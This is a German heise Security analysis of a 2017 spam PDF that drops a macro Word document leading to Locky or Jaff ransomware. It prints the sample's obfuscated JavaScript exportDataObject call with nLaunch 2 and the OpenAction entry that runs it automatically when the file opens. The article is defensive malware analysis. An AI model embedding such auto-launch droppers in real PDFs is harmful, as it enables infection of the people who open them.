heise online Logo
Anmelden
Menü
  • c't – Magazin für Computertechnik
  • iX – Magazin für professionelle Informationstechnik
  • MIT Technology Review – Das Magazin für Innovation von Heise
  • c't Fotografie - Das Magazin rund ums digitale Bild
  • Mac & i – Nachrichten, Tests, Tipps und Meinungen rund um Apple
  • Make – Kreativ mit Technik
  • Alle Magazine im Browser lesen
IT News
  • Newsticker
  • heise Developer
  • heise Netze
  • heise Open Source
  • heise Security
Online-Magazine
  • heise+
  • Telepolis
  • heise Autos
  • TechStage
  • tipps+tricks
Services
  • Stellenmarkt heise Jobs
  • Weiterbildung
  • heise Download
  • Preisvergleich
  • Whitepaper/Webcasts
  • DSL-Vergleich
  • Netzwerk-Tools
  • Spielen bei Heise
  • Loseblattwerke
  • iMonitor
  • IT-Markt
Heise Medien
  • heise Shop
  • Abo
  • Veranstaltungen
  • Arbeiten bei Heise
  • Mediadaten
  • Presse
Anzeige Go! Schule morgen
Newsletter heise-Bot heise-Bot Push Nachrichten Push Push-Nachrichten
heise Security Logo
  • News
    • Archiv
    • 7-Tage-News
  • Hintergrund
  • heise Security Pro
    • FAQs zu heise Security Pro
  • Events
  • Kontakt
  1. Security
  2. Hintergrund
  3. Analysiert: Alte Masche, neue Verpackung – Infektion durch PDFs

Analysiert: Alte Masche, neue Verpackung – Infektion durch PDFs

Hintergrund 24.05.2017 15:33 Uhr Olivia von Westernhagen
Analysiert: Alte Masche, neue Verpackung – PDFs als Angriffsvektor

Manipulierte Word-Dokumente sind bei Kriminellen beliebt, um Computer mit Malware zu infizieren. Dass auch PDF-Dateien ausführbaren Code enthalten können, ist hingegen ein wenig in Vergessenheit geraten. Eine unlängst grassierende Spam-Kampagne ist ein guter Grund, sich diese Gefahr anhand eines frischen Samples in Erinnerung zu rufen.

In jüngster Vergangenheit berichteten verschiedene Quellen von vermehrten Angriffswellen mit präparierten PDFs als E-Mail-Anhang. Lässt sich ein Opfer unter Windows von der Mail blenden und öffnet das PDF, fängt es sich über Umwege den Erpressungstrojaner Locky oder Jaff ein. Im Grunde handelt es sich bei diesem Infektionsweg um eine altbekannte Masche in neuer "Verpackung". Ich habe die Hülle geöffnet und mir angeschaut, wie der Schädling auf Computer kommt.

Gefakte Zahlungserinnerung

Der Betreff dieser Spam-Mail-Kampagne enthält typischerweise die Begriffe "Receipt", "Payment" oder "Invoice", gefolgt von einer beliebigen Ziffernfolge. Der Dateiname greift diese Nummerierung auf, wie das von mir untersuchte Beispiel-PDF "001_9018.pdf" zeigt. Dieses Sample hat mir netterweise ein Leser geschickt.

Der PDF Stream Dumper stellt die im PDF enthaltenen Objekte wie Streams, Scripts und Dictionaries einzeln dar.
Der PDF Stream Dumper stellt die im PDF enthaltenen Objekte wie Streams, Scripts und Dictionaries einzeln dar. (Bild: Screenshot)

Für die Analyse greife ich auf das nützliche Tool PDF Stream Dumper zurück, das speziell für die Analyse potentiell bösartiger PDFs entwickelt wurde. Sicherheitshalber starte ich es in einer VM. Eine schnelle Analyse fördert eingebettetes JavaScript zutage. Auf den ersten Blick wirkt der Code ziemlich umfangreich. Doch insgesamt werden nur zwei Funktionen ausgeführt, um die Malware-Infektion einzuleiten.

Der restliche Code dient lediglich der Tarnung und entstammt unter anderem einer Anwendung zur Verwaltung von Wetterdaten sowie einem Hacker-Skript mit dem geschmackvollen Namen "Smack my Bitch up". Der relevante Code wurde auf drei verschiedene Stellen im 200-zeiligen Skript verteilt und sieht folgendermaßen aus:

function ser2mis() {
return 'exportDataObject';
};

var absheder = ser2mis();
var firgi = 2;
var WeatherCtrlFocus = this[absheder];

function stdoutS() {
WeatherCtrlFocus({
cName: "LAMIKSJZ.docm",
nLaunch: firgi
});
};

Die umständliche Schreibweise dient offensichtlich der weiteren Verschleierung. Man könnte das Ganze nämlich auf folgendes reduzieren:

exportDataObject ({ cName: "LAMIKSJZ.docm", nLaunch: 2 }) 

Die Funktion exportDataObject richtet sich an die PDF-Anwendungen Acrobat und Acrobat Reader von Adobe. Doch auch andere Reader "verstehen" diesen Befehl.

Ein Blick auf den formatierten JavaScript-Code im PDF Stream Dumper zeigt: Von 200 Zeilen Code werden lediglich 13 Zeilen ausgeführt.
Ein Blick auf den formatierten JavaScript-Code im PDF Stream Dumper zeigt: Von 200 Zeilen Code werden lediglich zwölf Zeilen ausgeführt. (Bild: Screenshot)

Huckepack-Malware

Bei den Funktionen halten sich die Drahtzieher der PDF-Kampagne an die Vorgaben von Adobe zum Umgang mit JavaScript in PDF-Anwendungen. Die Acrobat JavaScript Scripting Reference dokumentiert, dass der Parameter cName den Namen des zu extrahierenden Datenobjekts erhält.

In diesem Fall lautet der Name "LAMIKSJZ.docm". Dabei handelt es sich um ein Word-Dokument mit Makros. Zu "nLaunch: 2" erfahre ich aus Adobes Dokumentation, dass die extrahierte Word-Datei in einem temporären Pfad gespeichert und dann nach dem Auftauchen einer Acrobat-Sicherheitswarnung ausgeführt wird. Schließt man den Acrobat Reader, wird die temporäre Kopie der Word-Datei automatisch gelöscht.

Wer sich ein bisschen mit JavaScript auskennt, hat bestimmt bemerkt, dass die Code-Ausführung in unserem Beispiel noch den Aufruf der im Code enthaltenen Funktion stdoutS() erfordert. Um zu gucken, wo sich der Aufruf dieser Funktion versteckt, schaue ich mir mithilfe des PDF Stream Dumpers das so genannte "Catalog Dictionary" des PDFs an. Dieses beschreibt mit der Objekt-Hierarchie vereinfacht gesagt die Struktur der Datei. Hier ein relevanter Auszug:

/Type/Catalog/Pages 9 0 R/Names 13 0 R/OpenAction.

Interessant ist der Dictionary-Eintrag OpenAction. Laut Adobes Beschreibung kann man damit automatisch eine Aktion ausführen, sobald ein PDF-Dokument geöffnet wurde. Die auszuführende Aktion finde ich in Form der im PDF verankerten "Action Dictionaries". Et voilà: Dabei handelt es sich um den gesuchten Aufruf: /S/JavaScript/JS(stdoutS();)

Netter Versuch ...

Nachdem nun klar ist, wie der Trick mit dem Word-Dokument in der PDF-Datei funktioniert, führe ich sie der Vollständigkeit halber noch einmal im Adobe Reader aus. Wie erwartet, wird das Word-Dokument erst nach dem Abnicken des Sicherheitshinweises in einen AppData-Unterordner des Windows-Nutzers extrahiert und geöffnet. Im PDF steht noch zusätzlich der Satz "Please open attached LAMIKSJZ.docm file", was so manchem Empfänger sicherlich schon aufgrund des Dateinamens und der Grammatik seltsam vorkommt.

Holzauge, sie wachsam: Bevor der Trojaner auf einem Computer landet, muss das Opfer mehrere Sicherheitswarnungen abnicken.
Holzauge, sie wachsam: Bevor der Trojaner auf einem Computer landet, muss das Opfer mehrere Sicherheitswarnungen abnicken. (Bild: Screenshot)

Im Word-Dokument läuft dann alles wie bei Makro-Viren gewohnt ab: Zum Aktivieren des enthaltenen VBA-Codes muss ein Opfer erst die "Geschützte Ansicht" von Word deaktivieren. Anschließend muss es noch der Ausführung von Makros zustimmen. Erst danach erfolgt das Nachladen der Payload in Form von Locky und die anschließende Infektion.

Ich komme zu dem Schluss, dass für einen erfolgreichen Angriff mittels PDF-.docm-Kombi geschicktes Social Engineering vonnöten wäre. Meiner Beispiel-Malware fehlt diese Überzeugungskraft eindeutig. Im Grunde stellen sich die Drahtzieher mit dem Warnhinweis im Acrobat Reader selbst ein Bein, und diese zusätzliche Hürde könnte ein Opfer vor einer Infektion bewahren.

Aus Sicherheitsgründen sollte man nicht jedes per Mail erhaltene PDF blind öffnen: Aufgrund der generellen Möglichkeit, ausführbaren Code in PDFs zu packen, ist auch Vorsicht bei diesem Dateiformat geboten – und zwar völlig unabhängig davon, welche Anwendung man zum Öffnen verwendet. (des)

Analysiert - die Serie auf heise Security

Im Rahmen der losen heise-Security-Serie "Analysiert:" werfen Experten einen Blick hinter die Kulissen von aktuellen Schädlingen, Betrugsmaschen oder anderen Tricks, die Sie um Ihre Daten bringen sollen.

Mehr zum Thema

  • Cybercrime
  • PDF
  • Ransomware

Teile diesen Beitrag

https://heise.de/-3722708 Drucken
Dienste
  • Security Consulter
  • Netzwerkcheck
  • Anti-Virus
  • Emailcheck
  • Krypto-Kampagne
Alerts! alle Alert-Meldungen

Citrix

Tails, Tor Browser

Google Chrome

Zoom

Anzeige
  • Kundenservice mit künstlicher Intelligenz
  • Wann lohnt es sich, die IT-Security auszulagern?
  • Weniger Umweltbelastung durch die IT
  • Mehr Kunden mit Ihrem Online-Shop gewinnen
  • Klimaschutz durch intelligentes Data-Center-Design
  • Mitmachen! Heise-Leser testen PCs von MSI
  • Mehr Nachhaltigkeit durch modernes Deployment
  • Gaia-X – die souveräne europäische Cloud
  • Chrome OS: Das bessere Betriebssystems
  • So geht intelligentes Gebäudemanagement
Artikel

Utimaco, der Krypto-Miner und ein Disclosure-Desaster​

Auch Anbieter von Hochsicherheitslösungen sind vor Securityproblemen nicht gefeit. Man sollte sich vorbereiten, bevor man davon erfährt, sagt Jürgen Schmidt.

11 Kommentare
Aufmacher: Kommentar Welt-Passwort-Gedenktag

Kommentar: "Willkommen zum Welt-Passwort-Gedenktag"

Welt-Passwort-Tag: Jürgen Schmidt, Senior Fellow Security bei Heise, hat einen Kommentar aus einer Zukunft ohne Passwörter geschickt.

230 Kommentare
  • Passwortsicherheit – Alles, was Sie wissen müssen
  • Welt-Passwort-Tag: Zugangssicherheit im Fokus

Der Patch-Alptraum: Wenn schnell nicht schnell genug ist

Neben den überbewerteten Zero-Day-Lücken gibt es eine weniger bekannte Bedrohung durch "Beinahe-Zero-Days". Die sind weitverbreitet und brandgefährlich.

95 Kommentare

Neueste Forenbeiträge

  1. Re: Desinfect 2021-p2 erkennt Ethernet Verbindung in Bauvorschlag 9-2022 nicht
    Hallo, ich schrieb selbst: Da ich weder den c't-Bauvorschlag 2021 bzw. 9/2022 noch ein aktuelleres Desinfec't (z.B. 2021/2022 aus dem…

    Forum:  Desinfect

    maal1 hat keinen Avatar
    von maal1; vor 45 Minuten
  2. Re: Nicht nur SOPHOS, auch ESET mag nicht, Rechtefehler bei ClamAV
    Moin, wir gucken. Viele Grüße des

    Forum:  Desinfect

    Avatar von Dennis Schirrmacher
    von Dennis Schirrmacher; Dienstag, 16:28
  3. Re: sudo apt-get update: Signatur abgelaufen
    Moin, wir schauen uns das an. Viele Grüße des

    Forum:  Desinfect

    Avatar von Dennis Schirrmacher
    von Dennis Schirrmacher; Dienstag, 16:27
News und Artikel
  • News
  • 7-Tage-News
  • News-Archiv
  • Hintergrund-Artikel
  • Alert-Meldungen
Service
  • Newsletter
  • Tools
  • Foren
  • RSS
  • mobil
Dienste
  • Security Consulter
  • Netzwerkcheck
  • Anti-Virus
  • Emailcheck
  • Krypto-Kampagne
  • Datenschutz
  • Cookies & Tracking
  • Impressum
  • Kontakt
  • Barriere melden
  • Mediadaten
  • 2207555
  • Content Management by InterRed
  • Hosted by Plus.line
  • Copyright © 2022 Heise Medien